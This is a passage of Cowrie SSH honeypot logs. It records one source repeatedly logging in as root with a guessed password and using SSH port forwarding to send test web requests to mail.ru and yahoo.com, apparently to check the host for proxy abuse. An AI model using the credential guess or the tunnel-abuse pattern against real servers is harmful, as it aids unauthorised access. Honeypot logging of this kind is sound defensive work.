57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.496839Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.745561Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32189,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32189","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.796959Z","session":"e3c3e639cad5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.847255Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":29398,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29398","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.988217Z","session":"e3c3e639cad5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.038305Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5245,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5245","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.180086Z","session":"e3c3e639cad5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.230374Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.281871Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52903,"dst_ip":"1.2.3.4","dst_port":22,"session":"740c4009612c","protocol":"ssh","message":"New connection: 77.83.207.83:52903 (1.2.3.4:22) [session: 740c4009612c]","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.330484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.340354Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.380583Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.629231Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1505,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1505","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.680429Z","session":"740c4009612c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.731175Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":32204,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:32204","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.872247Z","session":"740c4009612c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:02.922100Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21495,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21495","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.064304Z","session":"740c4009612c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.114015Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.164503Z","src_ip":"77.83.207.83","session":"740c4009612c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53009,"dst_ip":"1.2.3.4","dst_port":22,"session":"14be3a3ecaad","protocol":"ssh","message":"New connection: 77.83.207.83:53009 (1.2.3.4:22) [session: 14be3a3ecaad]","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.213957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.223955Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.264941Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.516870Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32323,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32323","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.568124Z","session":"14be3a3ecaad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.618947Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9357,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9357","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.760991Z","session":"14be3a3ecaad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.811690Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":26668,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26668","sensor":"my-vps","timestamp":"2025-08-31T03:46:03.952842Z","session":"14be3a3ecaad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.003445Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.055043Z","src_ip":"77.83.207.83","session":"14be3a3ecaad"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53094,"dst_ip":"1.2.3.4","dst_port":22,"session":"9352b44f9bce","protocol":"ssh","message":"New connection: 77.83.207.83:53094 (1.2.3.4:22) [session: 9352b44f9bce]","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.104712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.105348Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.155674Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.405670Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9311,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9311","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.457525Z","session":"9352b44f9bce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.507852Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":22327,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22327","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.648812Z","session":"9352b44f9bce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.699261Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7871,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7871","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.840675Z","session":"9352b44f9bce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.890929Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.942737Z","src_ip":"77.83.207.83","session":"9352b44f9bce"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53162,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1af04920513","protocol":"ssh","message":"New connection: 77.83.207.83:53162 (1.2.3.4:22) [session: d1af04920513]","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.992921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:04.994329Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.045617Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.299557Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21615,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21615","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.351419Z","session":"d1af04920513"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.402475Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24877,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24877","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.545367Z","session":"d1af04920513"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.596481Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":30317,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30317","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.741560Z","session":"d1af04920513"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.792657Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.844690Z","src_ip":"77.83.207.83","session":"d1af04920513"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53252,"dst_ip":"1.2.3.4","dst_port":22,"session":"f587e40c04d3","protocol":"ssh","message":"New connection: 77.83.207.83:53252 (1.2.3.4:22) [session: f587e40c04d3]","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.893969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.895049Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ec